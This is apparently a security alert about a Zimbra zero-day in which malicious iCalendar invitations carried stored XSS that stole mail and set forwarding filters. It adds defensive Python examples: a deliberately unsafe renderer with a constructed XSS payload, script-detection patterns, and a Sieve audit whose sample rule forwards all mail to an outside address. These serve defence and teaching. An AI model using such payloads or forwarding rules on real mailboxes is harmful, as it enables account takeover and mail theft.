Hackers Exploit Zimbra Zero Day Flaw

October 6, 2025
in Alerts

A zero-day vulnerability in Zimbra Collaboration Suite (ZCS) was exploited in targeted attacks. The attacks, which began in early January 2025, abused a flaw in how the webmail client processes iCalendar (.ICS) files, the standard format for sharing calendar invitations and scheduling data. By embedding a JavaScript payload in a calendar attachment that looked like an ordinary meeting invitation, the attackers could run script inside the victim’s authenticated webmail session, with the same access to mail, contacts and account settings as the logged-in user.

This stored cross-site scripting (XSS) vulnerability, tracked as CVE-2025-27915, existed because HTML carried inside .ICS files was not adequately sanitized before the client rendered it. It let an attacker steal user credentials, emails and contacts, and create mail filters that forward new messages to an attacker-controlled address; such a filter keeps working after the session ends and after the flaw is patched, until someone removes it. Zimbra released patches on January 27, 2025, but did not acknowledge active exploitation at the time.
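The mechanism described above, as an added example that is not Zimbra’s code and not the attackers’ payload: a small iCalendar parser that handles RFC 5545 line folding, a deliberately unsafe rendering that drops the DESCRIPTION value into the page as raw HTML, and the escaped rendering that neutralises it. The .ICS sample, the `fetch` target and the tag names are constructed for illustration.

```python
"""Added example (not Zimbra's code, not the exploit): how HTML carried in an
iCalendar property becomes stored XSS when a webmail client inserts it into the
page unescaped, and how escaping neutralises it. The .ICS sample is constructed."""
import html
import re

# Constructed sample. iCalendar folds long lines: a continuation line starts
# with a single space or tab, so a payload can be split across lines and a
# naive per-line check will miss it.
SAMPLE_ICS = (
    "BEGIN:VCALENDAR\r\n"
    "VERSION:2.0\r\n"
    "BEGIN:VEVENT\r\n"
    "UID:example-1@example.invalid\r\n"
    "SUMMARY:Protocol meeting\r\n"
    "DESCRIPTION:Agenda attached <img src=x onerror=\"fetch('/service/\r\n"
    " soap/GetContactsRequest')\"><script>alert(1)</script>\r\n"
    "END:VEVENT\r\n"
    "END:VCALENDAR\r\n"
)

def unfold(ics_text: str) -> list[str]:
    """Rejoin folded continuation lines (RFC 5545, section 3.1)."""
    lines: list[str] = []
    for raw in ics_text.splitlines():
        if raw[:1] in (" ", "\t") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines

def parse_event(ics_text: str) -> dict[str, str]:
    """Map property name -> value for the first VEVENT. Parameters such as
    DESCRIPTION;ALTREP=... are stripped from the name."""
    props: dict[str, str] = {}
    in_event = False
    for line in unfold(ics_text):
        if line == "BEGIN:VEVENT":
            in_event = True
        elif line == "END:VEVENT":
            break
        elif in_event and ":" in line:
            name, value = line.split(":", 1)
            props[name.split(";", 1)[0].upper()] = value
    return props

def render_value_vulnerable(value: str) -> str:
    """Insecure: the property value goes into the DOM as raw HTML."""
    return value

def render_value_safe(value: str) -> str:
    """Hardened: < > & " ' are escaped, so any markup is displayed as text."""
    return html.escape(value, quote=True)

# A tag needs a literal '<', so escaped output can never match this.
ACTIVE_CONTENT = re.compile(r"<script\b|<\w[^>]*\son\w+\s*=|javascript:", re.I)

def has_active_content(fragment: str) -> bool:
    """True if the fragment would execute script when assigned to innerHTML."""
    return ACTIVE_CONTENT.search(fragment) is not None

if __name__ == "__main__":
    desc = parse_event(SAMPLE_ICS)["DESCRIPTION"]
    print("raw rendering runs script:    ", has_active_content(render_value_vulnerable(desc)))
    print("escaped rendering runs script:", has_active_content(render_value_safe(desc)))
```

Escaping is the right default for a calendar description. If a product must show rich text from an invitation, the value has to go through an HTML sanitizer that whitelists tags and strips every `on*` attribute and `javascript:` URL, and that sanitizer must run on the unfolded value, not on individual .ICS lines.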

Security researchers at StrikeReady uncovered the attacks by hunting specifically for .ICS files larger than 10KB that contained JavaScript. They found that a threat actor had spoofed an email address belonging to the Libyan Navy to deliver the exploit to a Brazilian military organization. The malicious file was just over 10KB and used obfuscated JavaScript to evade signature-based detection. The payload ran asynchronously, injected hidden login fields into the page to capture credentials, and used the Zimbra SOAP API to retrieve emails.
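The hunting heuristic above, as an added example that is not StrikeReady’s tooling: walk a raw RFC 822 message, pick out calendar parts, and flag any that exceed 10KB and carry script indicators. The indicator list, the threshold constant and both sample messages are constructed here; the one detail worth copying is that the .ICS payload is unfolded before matching, because a keyword split across a folded line would otherwise be missed.

```python
"""Added example (not StrikeReady's tooling): flag .ICS attachments larger
than 10 KB that contain JavaScript indicators, the hunt described in the
article. Both sample messages below are constructed."""
import re
from email import message_from_bytes, policy
from email.message import EmailMessage

SIZE_THRESHOLD = 10 * 1024  # bytes; the ">10KB" criterion from the write-up

# Indicators of script content inside a calendar file (assumed list; tune it).
JS_INDICATORS = {
    "script_tag": re.compile(rb"<script\b", re.I),
    "event_handler": re.compile(rb"<\w[^>]*\son\w+\s*=", re.I),
    "javascript_uri": re.compile(rb"javascript:", re.I),
    "eval_or_atob": re.compile(rb"\b(?:eval|atob|unescape)\s*\("),
    "delayed_exec": re.compile(rb"\bsetTimeout\s*\(", re.I),
}

def unfold(ics_bytes: bytes) -> bytes:
    """Undo RFC 5545 line folding so tokens split across lines are rejoined."""
    return re.sub(rb"\r?\n[ \t]", b"", ics_bytes)

def is_ics_part(part) -> bool:
    """Calendar data by MIME type or by attachment name."""
    ctype = part.get_content_type()
    fname = (part.get_filename() or "").lower()
    return ctype in ("text/calendar", "application/ics") or fname.endswith(".ics")

def scan_message(raw: bytes, threshold: int = SIZE_THRESHOLD) -> list[dict]:
    """Return one finding per .ICS part that is both large and scripted."""
    msg = message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.is_multipart() or not is_ics_part(part):
            continue
        data = part.get_payload(decode=True) or b""
        unfolded = unfold(data)
        hits = [name for name, rx in JS_INDICATORS.items() if rx.search(unfolded)]
        if len(data) > threshold and hits:
            findings.append({
                "filename": part.get_filename() or "(inline)",
                "size": len(data),
                "indicators": hits,
            })
    return findings

def build_sample(ics_body: bytes, filename: str) -> bytes:
    """Constructed test message with one calendar attachment."""
    msg = EmailMessage()
    msg["From"] = "protocol@example.invalid"
    msg["To"] = "analyst@example.invalid"
    msg["Subject"] = "Meeting invitation"
    msg.set_content("Please see the attached invitation.")
    msg.add_attachment(ics_body, maintype="text", subtype="calendar",
                       filename=filename)
    return msg.as_bytes()

# Constructed payload: the script tag is folded across two lines and the file
# is padded past the size threshold, mirroring the "just over 10KB" sample.
MALICIOUS_ICS = (
    b"BEGIN:VCALENDAR\r\nBEGIN:VEVENT\r\nSUMMARY:Invite\r\n"
    b"DESCRIPTION:<scr\r\n ipt>setTimeout(function(){eval(atob('...'))},60000)</script>"
    + b"A" * 11000
    + b"\r\nEND:VEVENT\r\nEND:VCALENDAR\r\n"
)
BENIGN_ICS = (
    b"BEGIN:VCALENDAR\r\nBEGIN:VEVENT\r\nSUMMARY:Lunch\r\n"
    b"END:VEVENT\r\nEND:VCALENDAR\r\n"
)

if __name__ == "__main__":
    for f in scan_message(build_sample(MALICIOUS_ICS, "invite.ics")):
        print(f"ALERT {f['filename']} ({f['size']} bytes): {', '.join(f['indicators'])}")
    print("benign findings:", scan_message(build_sample(BENIGN_ICS, "lunch.ics")))
```

The size threshold is a triage aid, not a security boundary: an attacker can trim the payload below it, so the indicator match should also be run on small calendar parts when the volume allows.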

The researchers’ analysis showed that the code was built for stealth and persistence. It monitored user activity, exfiltrated contacts and shared folders, and hid certain user interface elements so the victim would not notice the changes it made. It also waited 60 seconds before running and kept an execution gate that stopped it from running again for three days, so that repeated activity in the mailbox would be less likely to draw attention.

StrikeReady could not definitively attribute the attack to a specific group, but noted that the use of a zero-day points to a well-resourced threat actor. Some of the tactics, techniques, and procedures (TTPs) observed resembled those used by UNC1151, a group reportedly linked to the Belarusian government. Following the disclosure, Zimbra acknowledged the issue and advised users to update their software, review mail filters for unauthorized changes, and monitor for suspicious network activity. The filter review is not optional: patching closes the XSS, but it does not remove a forwarding rule that was created while the flaw was open.
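One way to carry out the mail-filter review above, as an added example that is not Zimbra’s tooling: Zimbra stores an account’s filters as a Sieve script, and the audit below parses such a script, pulls out every `redirect` action and ranks the ones that send mail to an outside domain while discarding the local copy or matching every message. The sample script, the domain list and the risk rule are constructed; the exact command that exports the script from your deployment (we believe `zmprov ga user@domain zimbraMailSieveScript`, but verify against your version) is an assumption.

```python
"""Added example (not Zimbra's tooling): audit a Zimbra account's Sieve filter
script for rules that forward mail to outside addresses, the persistence the
article describes. SAMPLE_SIEVE is constructed in the shape of a
Zimbra-generated script."""
import re

SAMPLE_SIEVE = '''require ["fileinto", "reject", "tag", "flag"];

# Team updates
if anyof (header :contains ["subject"] "[team]") {
    fileinto "Team";
    stop;
}

# .
if anyof (header :contains ["from"] "") {
    redirect "archive-8d1@mail-collector.example.net";
    discard;
}

# Forward to assistant
if allof (header :contains ["subject"] "expense") {
    redirect :copy "assistant@corp.example";
}
'''

# One "# name" comment followed by an if-block with a flat (non-nested) body.
RULE_RE = re.compile(
    r"(?:#\s*(?P<name>[^\n]*)\n)?\s*\bif\b\s+(?P<test>.*?)\s*\{(?P<body>.*?)\}",
    re.S,
)
# redirect "addr"  or  redirect :copy "addr"  (:copy keeps the local copy)
REDIRECT_RE = re.compile(r'\bredirect\b(?P<copy>\s*:copy)?\s*"(?P<addr>[^"]+)"')

def audit_sieve(script: str, internal_domains: set[str]) -> list[dict]:
    """Return one finding per redirect action with the attributes that matter."""
    findings = []
    for m in RULE_RE.finditer(script):
        body = m.group("body")
        for r in REDIRECT_RE.finditer(body):
            addr = r.group("addr")
            domain = addr.rsplit("@", 1)[-1].lower()
            findings.append({
                "rule": (m.group("name") or "").strip() or "(unnamed)",
                "target": addr,
                "external": domain not in internal_domains,
                "keeps_copy": r.group("copy") is not None,
                "discards_local": re.search(r"\bdiscard\s*;", body) is not None,
                # an empty match string makes the test true for every message
                "matches_everything": '""' in m.group("test"),
            })
    return findings

def high_risk(findings: list[dict]) -> list[dict]:
    """External forwarding that also hides itself or catches all mail."""
    return [f for f in findings
            if f["external"] and (f["discards_local"] or f["matches_everything"])]

if __name__ == "__main__":
    internal = {"corp.example"}  # assumed list of your own mail domains
    for f in high_risk(audit_sieve(SAMPLE_SIEVE, internal)):
        print(f"HIGH RISK rule {f['rule']!r} -> {f['target']} "
              f"(discard={f['discards_local']}, catch_all={f['matches_everything']})")
```

Run the audit over every account, not only the reported victims: the payload ran with the victim’s session, so any mailbox that opened the invitation could carry a rule like the second one, and its name is chosen to look harmless in the filter list.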

Reference:

  • Hackers Exploit Zimbra Zero Day via Malicious iCalendar Files